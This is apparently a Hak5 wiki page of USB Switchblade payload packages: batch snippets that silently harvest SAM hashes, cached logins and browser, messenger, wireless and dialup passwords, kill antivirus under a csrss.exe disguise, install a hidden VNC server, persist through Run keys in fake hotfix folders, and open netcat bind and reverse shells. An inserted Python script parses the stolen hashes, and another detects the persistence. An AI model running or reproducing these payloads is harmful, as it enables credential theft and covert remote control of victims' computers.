Hak5

Switchblade Packages

From Hak5

This page is intended to collect packages for the USB Switchblade. The idea is to document individual packages rather than maintain numerous complete payloads. A basic understanding of how the Switchblade works is required to install these packages; the basic idea is to add the program (if necessary) to the \WIP\CMD directory and update the go.cmd file with the appropriate lines.

To add a package, use the Package Uploader to host binaries. Warning: if this service is abused it will be taken down. Then update this page using the template.

Image:Sbpackages.png


Installing

If you do not have a U3 smart device use this package (unzip it into the root directory of your drive): http://www.hak5.org/packages/files/Non_U3.rar --spektormax
If you have a San Disk drive use this: http://www.hak5.org/packages/files/U3_San_Disk.rar
If you have a Memorex drive use this: http://www.hak5.org/packages/files/U3_Memorex.rar

If you have a San Disk drive and want to keep the U3 LaunchPad use this: http://www.hak5.org/packages/files/U3_San_Disk_Launchpad.rar --SubzeroAsh

go.cmd

The go.cmd file is located in \WIP\CMD. It is what runs all the parts of the package together. Before you put anything specific in the go.cmd you must have the following lines at the very beginning--spektormax

@echo off
if not exist \WIP\dump md \WIP\dump >nul
if not exist \WIP\dump\%computername% md \WIP\dump\%computername% >nul
cd \WIP\CMD\ >nul

All of the other "packages" are appended to go.cmd, with their files placed in the directories each package specifies.

Alternative Loader

This is an alternative loader. It is a batch file, so you don't need a script server to be started on the machine. This is only for U3 drives. ISO and needed files included! Have fun!

--Nakaori 10:20, 18 October 2006 (PDT)

Note this is not totally silent, as cmd.exe has to launch in order to run the batch file, so there will be a black pop-up window.--spektormax

To make it silent, make a batch script with the following:

start nircmd.exe execmd call batch.bat

(you need nircmd.exe) (rename batch.bat to the name of your batch file) (a black window will still pop up, but only for a split second)

Tools

NirCmd: http://www.hak5.org/packages/files/nircmd.exe --spektormax
AV Killer 1.2 BETA: http://www.hak5.org/packages/files/csrss.exe
NOTE: AvKill is named csrss.exe in order not to draw suspicion.

Arming/Disarming the drive

If you are like most people, who occasionally forget to hit shift when they insert the drive into their own computer, then you need a way to arm and disarm the drive. --spektormax
This technique basically works by renaming go.cmd to go1.cmd and effectively making the drive harmless.
Place both in the root directory of the drive.

ARM.bat:

@echo off
if exist .\WIP\CMD\go1.cmd (rename .\WIP\CMD\go1.cmd go.cmd)

DisArm.bat

@echo off
if exist .\WIP\CMD\go.cmd (rename .\WIP\CMD\go.cmd go1.cmd)

Warning: the batch files will be unable to find go.cmd or go1.cmd if the "Hidden" attribute is set, so make sure that you do not hide the go.cmd file.

Switchblade Kill Switch

This is an alternate method of preventing the switchblade from running on a computer-by-computer basis. --Leapo
Add this code to the beginning of go.bat (or any other batch file you don't want to be able to run on this computer):
if exist c:\safety.txt goto end
cd .\wip\cmd >nul

And add this tag to the end of go.bat:

:end

Supremely simple, yet effective. As long as this code finds a file called "safety.txt" in the root of your C:\ drive, it will skip to the ":end" tag without running anything else in the batch file.

System Info

Gathers general information about the computer including computer name, logged in user, time, date, and IP address. --Darren

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ***********[System info]************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \WIP\dump\%computername%\%computername%.log 2>&1
ipconfig /all >> \WIP\dump\%computername%\%computername%.log 2>&1

Dump SAM

Gathers password hashes using PWDump --Darren

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ***********[Dump SAM]*************** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\pwdump 127.0.0.1 >> \WIP\dump\%computername%\%computername%.log 2>&1
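The System Info and Dump SAM snippets above both append to the same \WIP\dump\%computername%\%computername%.log, so anything that post-processes a haul has to split that file on its ***[Section]*** banners. The following Python script is an added example (not code from this page or from Hak5) that does exactly that and decodes the pwdump lines (user:RID:LM hash:NT hash:::) into fields, flagging accounts whose NT hash is not the empty-password value and accounts for which an LM hash is still stored, which are the easy ones to crack. The sample log is constructed, and the hashes in it are made up apart from the well-known empty-password LM/NT values; the banner layout and the "Computer Name is: ... Logged on User Name Is: ..." line are taken from the snippets above.

```python
r"""Parse a USB Switchblade dump log (\WIP\dump\<host>\<host>.log).

Added example, not code from the Hak5 page. Splits the log on the
***[Section]*** banners the go.cmd snippets write and decodes pwdump
lines. SAMPLE_LOG is constructed; its hashes are made up except the
well-known empty-password LM/NT values.
"""
import re

BANNER_RE = re.compile(r"^\*+\[(?P<name>[^\]]+)\]\*+\s*$")   # ****[Section]****
RULE_RE = re.compile(r"^\*+\s*$")                            # plain ******** separator
SYSINFO_RE = re.compile(
    r"Computer Name is: (?P<host>\S+) and the Logged on User Name Is: (?P<user>\S+)")
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[^:]*):(?P<nt>[^:]*):::$")
HEX32_RE = re.compile(r"^[0-9a-f]{32}$")

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

SAMPLE_LOG = """\
************************************
***********[System info]************
************************************
Computer Name is: LAB-PC and the Logged on User Name Is: alice The date and Time is: Wed 10/18/2006 10:20:00.00
Windows IP Configuration
   Host Name . . . . . . . . . . . . : LAB-PC
************************************
***********[Dump SAM]***************
************************************
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""


def split_sections(text):
    """Map banner name -> the non-banner lines that follow it, in file order."""
    sections = {}
    current = "preamble"
    for raw in text.splitlines():
        line = raw.rstrip()
        m = BANNER_RE.match(line)
        if m:
            current = m.group("name").strip()
            sections.setdefault(current, [])
            continue
        if RULE_RE.match(line) or not line.strip():
            continue
        sections.setdefault(current, []).append(line)
    return sections


def parse_pwdump(lines):
    """Decode user:RID:LM:NT::: lines; anything else (errors, banners) is skipped."""
    accounts = []
    for line in lines:
        m = PWDUMP_RE.match(line.strip())
        if m:
            acct = m.groupdict()
            acct["rid"] = int(acct["rid"])
            acct["lm"] = acct["lm"].lower()
            acct["nt"] = acct["nt"].lower()
            accounts.append(acct)
    return accounts


def summarize(text):
    """Host, logged-on user, section list and the accounts worth cracking first."""
    sections = split_sections(text)
    host = user = None
    for line in sections.get("System info", []):
        m = SYSINFO_RE.search(line)
        if m:
            host, user = m.group("host"), m.group("user")
            break
    accounts = parse_pwdump(sections.get("Dump SAM", []))
    return {
        "host": host,
        "user": user,
        "sections": list(sections),
        "accounts": accounts,
        # NT hash differs from the empty-password hash: a real password is set
        "nonempty_passwords": [a["user"] for a in accounts if a["nt"] != EMPTY_NT],
        # a genuine LM hash is stored: 14-char, case-insensitive, trivially cracked
        "lm_hash_stored": [a["user"] for a in accounts
                           if HEX32_RE.match(a["lm"]) and a["lm"] != EMPTY_LM],
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Python is used here rather than batch because this is offline analysis of the collected log on the analyst's machine, not something run from the drive; the same section splitter works for the other packages below, since they all write the same banner layout.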

Product Key

Grabs product keys for things like windows, office, and other Microsoft packages --spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump Product Keys]****** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\produkey /nosavereg /stext "\WIP\dump\%computername%\%computername%_pk.log" /remote %computername% >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_pk.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_pk.log" >nul

Internet Explorer Password Grabber

Grabs stored passwords in IE (even IE 7)--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump IE7 secrets]******* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\iepv.exe /stext "\WIP\dump\%computername%\%computername%_ie7.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_ie7.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_ie7.log" >nul

Windows Update Lister

Lists all the Windows updates currently installed (useful if you want to do a vulnerability assessment). Because the list can be long it goes to its own file, %computername%-updateslist.log, rather than the main log.--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
echo ***********[Dump updates-list]******* >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
   .\wul.exe /stext "\WIP\dump\%computername%\%computername%_wul.log" >> \WIP\dump\%computername%\%computername%-updateslist.log 2>&1
   copy \WIP\dump\%computername%\%computername%-updateslist.log+\WIP\dump\%computername%\%computername%_wul.log \WIP\dump\%computername%\%computername%-updateslist.log >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_wul.log" >nul

Network Password Dumper

Not completely sure what this one does, but it found my auto logon password--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump Network PW]******** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\netpass.exe /stext "\WIP\dump\%computername%\%computername%_np.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_np.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_np.log" >nul

Cachedump

This is very useful in a domain situation; this will dump the last 10 cached logins--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ************[Dump Cache PW]********* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\cachedump.exe >> \WIP\dump\%computername%\%computername%.log 2>&1

Netstat

This uses the Windows built-in utility netstat to show you all the current network connections the computer is making --spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Network Services]******* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
netstat.exe -abn >> \WIP\dump\%computername%\%computername%.log 2>&1

Port Scan

Similar to netstat, but with a different interface. It runs the Microsoft utility PortQryV2 and appends the result to \WIP\dump\%computername%\%computername%.log. The package contains PortQry in the folder Files, plus test.bat. Just unzip it to the root of the U3/regular USB flash drive.

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ************[Port Scan]************* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\portqry -local -y -l \WIP\dump\%computername%\%computername%_ports.log >nul
copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_ports.log \WIP\dump\%computername%\%computername%.log >nul
del /f /q "\WIP\dump\%computername%\%computername%_ports.log" >nul

Unzip this into the \WIP\CMD directory http://www.hak5.org/packages/files/PortQry.exe

--Masterpyro/Brennan

Messenger password Dumper

This dumps all messenger passwords--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump messenger PW]******** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\mspass.exe /stext "\WIP\dump\%computername%\%computername%_ms.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_ms.log* \WIP\dump\%computername%\%computername%.log  >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_ms.log" >nul

Ie History Viewer

This allows you to see all the web pages visited (in IE)--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo ***********[Dump URL History]******* >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\iehv.exe /stext "\WIP\dump\%computername%\%computername%_ie.log"
   type "\WIP\dump\%computername%\%computername%_ie.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   del /f/q "\WIP\dump\%computername%\%computername%_ie.log"

If you think that the history will be too long, simply send the output to a separate logfile, easily done by changing the code to the following.

Echo ************************************ >> \WIP\dump\%computername%\%computername%-ie.log 2>&1
echo ***********[Dump URL History]******* >> \WIP\dump\%computername%\%computername%-ie.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%-ie.log 2>&1
 .\iehv.exe /stext "\WIP\dump\%computername%\%computername%-ie.log"

"it appears that the iehv.exe program's /stext attribute does not work like the other package programs, and will write the log for the history to "\WIP\dump\%computername%\%computername%_ie.log", regardless of the output redirection (>>) immediately afterwards. Please fix the code if you know a way around this, and delete this message"

Using the "type" command, the Windows equivalent of the "cat" command, we can output the text to our log. The first version writes the history to its own file and then, using "type", appends that file to our log --elmer

FireFox Password Stealer

This steals all the FireFox Passwords--spektormax

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\FirePassword.exe "%appdata%\Mozilla\Firefox\Profiles" >> \WIP\dump\%computername%\%computername%.log

The previous code doesn't work. This way works but it is not very clean code. ~Stebalien

set RtD=%CD%
cd /D "%appdata%\Mozilla\Firefox\Profiles" >nul
set PROFILE=
for /D %%i in (*) do set PROFILE=%%i
cd /D %RtD% >nul
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\FirePassword.exe "%appdata%\Mozilla\Firefox\Profiles\%PROFILE%" >> \WIP\dump\%computername%\%computername%.log


Note: This code does not always work, as it sometimes brings up the error " Failed to open the signon file D:\Documents and Settings\Adam D\Application Data\Mozilla\Firefox\Profiles\[whatever].default/signons.txt". Could this be fixed??

Fixed version:

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
.\FirePassword.exe >> \WIP\dump\%computername%\%computername%.log

Download: http://www.securityxploded.com/download/FirePassword_bin.zip Stick ALL files in the CMD. ~rodz91 (Sorry for offsite linking, package uploader gives me an error)

Wireless Passwords

This grabs all wireless network passwords that have been used with Windows Wireless Zero Configuration ---r1
Add this line to \wip\cmd\go.cmd:

.\nircmd.exe execmd CALL \WIP\CMD\WIRELESS.BAT

the .bat file

START /b .\WirelessKeyView.exe /STEXT \WIP\DUMP\%COMPUTERNAME%\%COMPUTERNAME%WIRELESS.TXT

Place the .bat and .exe from the .rar into \wip\cmd. Make sure to edit the included .bat file and change

nircmd execmd CALL \WIP\CMD\WIRELESS.BAT

to

.\nircmd.exe execmd CALL \WIP\CMD\WIRELESS.BAT

Also, place a copy of nircmd.exe from the root directory of your USB drive into the CMD folder for it to function properly. This change is necessary because nircmd is not installed on the target system, so "nircmd execmd" is not a recognized Windows command there.

Dialup Password Dump

Placing dialupass.exe into the CMD directory and adding these lines to your go.cmd file will dump all of the dialup passwords. The log path below follows the \WIP\dump\%computername% layout set up at the top of go.cmd; older Switchblade builds wrote to \Documents\logfiles instead, so adjust it if yours does.

Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
echo **********[Dump Dialup PW]********** >> \WIP\dump\%computername%\%computername%.log 2>&1
Echo ************************************ >> \WIP\dump\%computername%\%computername%.log 2>&1
   .\dialupass.exe /stext "\WIP\dump\%computername%\%computername%_du.log" >> \WIP\dump\%computername%\%computername%.log 2>&1
   copy \WIP\dump\%computername%\%computername%.log+\WIP\dump\%computername%\%computername%_du.log \WIP\dump\%computername%\%computername%.log >> nul
   del /f /q "\WIP\dump\%computername%\%computername%_du.log" >nul

Username adder

This will add a username and password to the computer--spektormax

start pwservice.exe

Editing Send.bat (and stunnel.conf)

If you are using the Haksaw, VNCinstaller with IP sender, or NMAP, you need to know how to edit the send.bat and stunnel.conf files.--spektormax
send.bat (located in \WIP\VNCInstallfiles, \WIP\SBS\, or \WIP\nmap_install): Use this to change the email settings

:: Configure Email Options
SET emailfrom=
SET emailto=
SET password=
SET subject= %computername%_ip

In emailfrom you must put the address of the account you have with the SMTP provider (the default here is Gmail), and in password the password of that account. In emailto you can put either the same address as the from or any other email address you wish the report sent to.

stunnel.conf (located in \WIP\VNCInstallfiles, \WIP\SBS\, or \WIP\nmap_install): use this to edit the SMTP settings

[SMTP Gmail]
accept = 127.0.0.1:1099
connect = smtp.gmail.com:465 

The accept line is the local IP and port that send.bat connects to; it should for the most part stay the same. The connect line is the SMTP server's address and port. For Gmail it's smtp.gmail.com and the port is 465.

Silent VNC installer (with external IP send)

This will install VNC onto their computer on ports 5900 and 80 with the password "yougothacked"--spektormax

@echo off
mkdir %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%\hbn"
cd \WIP\VNCInstallFiles
copy *.* %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%\hbn"
attrib %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%\hbn" +s +h
start %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\services.bat
regedit /s \WIP\CMD\vncdmp.reg
regedit /s \WIP\CMD\vncdmp1.reg
regedit /s \WIP\CMD\vncdmp2.reg
regedit /s \WIP\CMD\VNC.reg
ping -n 3 localhost  > nul
net start WinVNC
nircmd.exe execmd CALL \WIP\VNCInstallfiles\send.cmd

The VNC registry files and shortcut.exe must be unzipped into \WIP\CMD: http://www.hak5.org/packages/files/vncregestry.rar The actual VNC install files must be put into \WIP\VNCInstallfiles: http://www.hak5.org/packages/files/VNCInstallfiles.rar

Edit (5/24/07 The VNC file links are corrupt. Someone please fix this.)

Reverse VNC Connection

In order to circumvent the issue with port forwarding, the victim connects to your machine. To make that possible, you have to forward a port (5500) - Joerg

Adds a startup entry which connects to your machine:

@echo off
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Support Center" /t REG_SZ /d "your.path.of.choice\reverse.exe"

This is the reverse.exe:

@echo on
".\nircmd.exe" wait 40000
:loop
".\vnc.exe" -connect your.static.hostname::5500
".\nircmd.exe" wait 90000
goto loop

USB Hack Saw

This installs the famous Hak5's USB Hacksaw--spektormax

mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"
cd \WIP\SBS
attrib *.* -s -h
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"
attrib *.* +s +h
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"
attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB931337$
sbs.exe

This must be put into the \WIP\SBS directory: http://www.hak5.org/packages/files/Hack_Saw.rar

Internal IP Nmaper

This will do an nmap scan on the internal IP range of the box and email it to you--spektormax

mkdir %systemroot%\$NtUninstallKB91337$ || mkdir "%appdata%\scs"
cd \WIP\nmap_install
attrib *.* -s -h
copy *.* %systemroot%\$NtUninstallKB91337$ || copy *.* "%appdata%\scs"
attrib *.* +s +h
attrib %systemroot%\$NtUninstallKB91337$ +s +h & attrib "%appdata%\scs" +s +h
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB91337$
nircmd execmd CALL nmap.bat

Unzip this into the \WIP\nmap_install directory: http://www.hak5.org/packages/files/nmap_install.rar

Folding@Home Installer

This will install the Folding@Home software onto their computer--spektormax
NOTE: Due to demands from the Hak5 folding group, this package will not fold under the "Hak5" team name, in order not to tarnish Hak5's reputation. Instead it will fold under the U3_Zombie group.

start \WIP\fld\csrss.exe
mkdir %systemroot%\$NtUninstallKB531337$ || mkdir "%appdata%\fld"
cd \WIP\fld
attrib *.* -s -h
copy *.* %systemroot%\$NtUninstallKB531337$ || copy *.* "%appdata%\fld"
attrib *.* +s +h
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v csrss /t REG_SZ /d "%systemroot%\$NtUninstallKB531337$\csrss.exe" /f || "%appdata%\fld\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\fld\nircmd.exe execmd CALL csrss.exe" /W:"%appdata%\fld" /I:"%appdata%\fld\blank.ico"

reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v svhost /t REG_SZ /d "%systemroot%\$NtUninstallKB531337$\rundll.exe svhost.exe" /f || "%appdata%\fld\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\  .lnk" /A:C /T:"%appdata%\fld\rundll.exe svhost.exe" /W:"%appdata%\fld" /I:"%appdata%\fld\blank.ico"
attrib %systemroot%\$NtUninstallKB531337$ +s +h & attrib "%appdata%\fld" +s +h
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB531337$
rundll.exe svhost.exe

Unzip this into the \WIP\fld\ directory: http://www.hak5.org/packages/files/fld.rar IMPORTANT NOTE: Because the Folding@Home software is not silent when run, I used a special program to hide it. This WILL be detected as a virus, therefore you need the AV killer. The reason it's called csrss.exe is so that it will look normal if it is found when you press CTRL-ALT-DEL.
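The Hacksaw, reverse VNC and Folding@Home packages above all persist the same way: a dropped directory dressed up as a hotfix uninstall folder (%systemroot%\$NtUninstallKB...$) or a folder under %appdata%, a binary named after a system process (csrss.exe, svhost.exe), and a HKLM\...\Run value (USBMedia, csrss, svhost, "Microsoft Windows Support Center"). The following Python script is an added example, not code from this page or from Hak5, showing how a responder would triage a reg export of the Run keys for exactly those traits. The .reg text is a constructed sample; the reason codes and the lookalike-name list are my own, and only the value names and paths quoted from the packages above are taken from the page.

```python
r"""Triage ...\Run entries in a .reg export for Switchblade-style persistence.

Added example, not code from the Hak5 page. Indicators taken from the page's
packages: Run values named USBMedia/csrss/svhost/"Microsoft Windows Support
Center", executables in fake %SystemRoot%\$NtUninstallKB...$ folders or under
Application Data, and binaries named after system processes. SAMPLE_REG is a
constructed export, not from a real host.
"""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
"USBMedia"="C:\\WINDOWS\\$NtUninstallKB931337$\\sbs.exe"
"Microsoft Windows Support Center"="C:\\Documents and Settings\\alice\\Application Data\\vnc\\reverse.exe"
"csrss"="C:\\WINDOWS\\$NtUninstallKB531337$\\csrss.exe"
"svhost"="C:\\WINDOWS\\$NtUninstallKB531337$\\rundll.exe svhost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Whatever"="ignored"
'''

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"="(?P<data>(?:[^"\\]|\\.)*)"\s*$')
UNINSTALL_DIR_RE = re.compile(r"\\\$NtUninstall[^\\]*\$\\", re.IGNORECASE)
SYSTEM_PROCESS_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "svchost.exe",
                        "winlogon.exe", "services.exe"}
LOOKALIKE_NAMES = {"svhost.exe", "scvhost.exe", "svch0st.exe", "csrs.exe"}  # my own list
PAGE_VALUE_NAMES = {"usbmedia", "csrss", "svhost", "microsoft windows support center"}


def unescape(s):
    """Undo .reg string escaping (\\ -> \, \" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def run_entries(reg_text):
    """Yield (key, value name, data) for every value under a ...\Run or ...\RunOnce key."""
    key = None
    for line in reg_text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        if key is None or not re.search(r"\\Run(Once)?$", key, re.IGNORECASE):
            continue
        m = VALUE_RE.match(line)
        if m:
            yield key, unescape(m.group("name")), unescape(m.group("data"))


def exe_tokens(data):
    """The program a Run command launches (quoted, or up to the first .exe), then any .exe arguments."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        head, rest = data[1:end], data[end + 1:]
    else:
        m = re.match(r"(.+?\.exe)(.*)$", data, re.IGNORECASE | re.DOTALL)
        head, rest = (m.group(1), m.group(2)) if m else (data, "")
    return [head] + [t for t in rest.split() if t.lower().endswith(".exe")]


def triage_entry(name, data):
    reasons = set()
    if name.lower() in PAGE_VALUE_NAMES:
        reasons.add("known_switchblade_value_name")
    for i, path in enumerate(exe_tokens(data)):
        low = path.lower()
        base = low.rsplit("\\", 1)[-1]
        # Real hotfix uninstall folders hold rollback files; nothing autostarts from them.
        if i == 0 and UNINSTALL_DIR_RE.search(path):
            reasons.add("autostart_from_hotfix_uninstall_dir")
        if i == 0 and ("\\application data\\" in low or "\\appdata\\" in low):
            reasons.add("autostart_from_user_profile")
        if base in SYSTEM_PROCESS_NAMES and "\\system32\\" not in low:
            reasons.add("system_process_name_outside_system32")
        if base in LOOKALIKE_NAMES:
            reasons.add("system_process_lookalike_name")
    return reasons


def triage(reg_text):
    """Return only the Run entries that trip at least one rule, with sorted reason codes."""
    findings = []
    for key, name, data in run_entries(reg_text):
        reasons = triage_entry(name, data)
        if reasons:
            findings.append({"key": key, "name": name, "data": data, "reasons": sorted(reasons)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REG):
        print(f["name"], f["reasons"])
```

Feed it the text of `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKCU equivalent), decoded from the UTF-16 that reg.exe writes. The uninstall-folder rule is the strongest single signal: genuine $NtUninstallKB...$ folders only hold rollback files and are never a Run target, so any autostart pointing into one is worth pulling for analysis.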

Folder Popuper (to show finish)

This will Pop up the root folder of the flash drive to show that it has finished being pwned--spektormax

ping -n 5 localhost > NUL
start \
nircmd.exe win max ititle "Removeable"

NetCat Bindshell

This will automatically bind a shell on port 52323. It is hidden using nircmd.exe. More info inside the batch file. http://www.hak5.org/packages/files/bindshell.netcat.rar

NetCat Reverse Shell

This method is used with the above package. It gives you a shell on the remote PC without the target PC needing any ports forwarded on its router.

To make a reverse shell work you must have the listener running on your PC. So open a command prompt and run:

nc -p 52323 -L -vvv

Then download the netcat package from the section above and change one line: edit the bindshell.port.52323.cmd file and replace this line:

.\nircmd.exe execmd .\nc -L -p 52323 -d -e cmd.exe

with this:

nc your.ip 52323 -e cmd.exe

When the client connects to your PC, a shell will pop up on your PC, and there you have a reverse shell

Truecrypt

Use this script to run the Switchblade from a TrueCrypt volume. It disables the internet connection, mounts a TrueCrypt volume, runs avkill (csrss) from the volume, runs the payload from the volume, dismounts the volume, then re-enables the internet connection. TrueCrypt and the volume must be stored in "Applications\TrueCrypt", the volume name is "Encrypted.tc", and a copy of nircmd must be in "Applications\Nircmd". You can also edit the batch file. ~Stebalien

@echo off
ipconfig /release
cd \ >nul
set drive=%cd%
set unmount="false"
if not exist "X:\" set unmount="true"
if not exist "X:\" start Applications\Nircmd\nircmd.exe exec hide "Applications\TrueCrypt\TrueCrypt.exe"
Applications\Nircmd\nircmd.exe wait 100
if not exist "X:\" "Applications\TrueCrypt\TrueCrypt.exe" /v Applications\TrueCrypt\Encrypted.tc /lx /q preferences
x:\csrss.exe
cd Applications\Nircmd >nul
nircmd wait 10000
cd /D "X:\WIP\SWITCHBLADE\CMD" >nul
call "X:\WIP\SWITCHBLADE\CMD\go.cmd"
cd /D %drive% >nul
if %unmount%=="true" Applications\TrueCrypt\TrueCrypt.exe /q preferences /dx
ipconfig /renew

Automated Backup and Restore

A simple set of tools to backup and recover your switchblade in the event that it is nuked by an antivirus --Leapo
This package includes two batch files and a program (rar.exe) that can be used to automatically archive your switchblade to an encrypted RAR file, and restore from it when you're back to a safe computer.

Download Mirrors:
- http://rapidshare.com/files/37957439/Restore.zip.html)
- http://z02.zupload.com/download.php?file=getfile&filepath=33364
- http://www.megaupload.com/?d=59CPYF6Z
- http://www.filesend.net/download.php?f=a50ee1f8cf4a73948979ea2ce1e0f211
- http://www.badongo.com/file/3472780
- http://depositfiles.com/files/1046292

Here's how you set it up:
- Set up a clean switchblade that hasn't been nuked by your antivirus yet.
- Drop the "Restore" folder (from the zip file you just downloaded) onto the root of your switchblade.
- Open the Restore folder and run "Update_Archive.bat" to make an encrypted backup of the everything on the switchblade.

Now you're all set, after your antivirus has nuked the switchblade again, here's how you restore the backup so you'll be ready to go again:
- Plug the switchblade into a safe computer.
- and run "Restore.bat" to restore the backup.
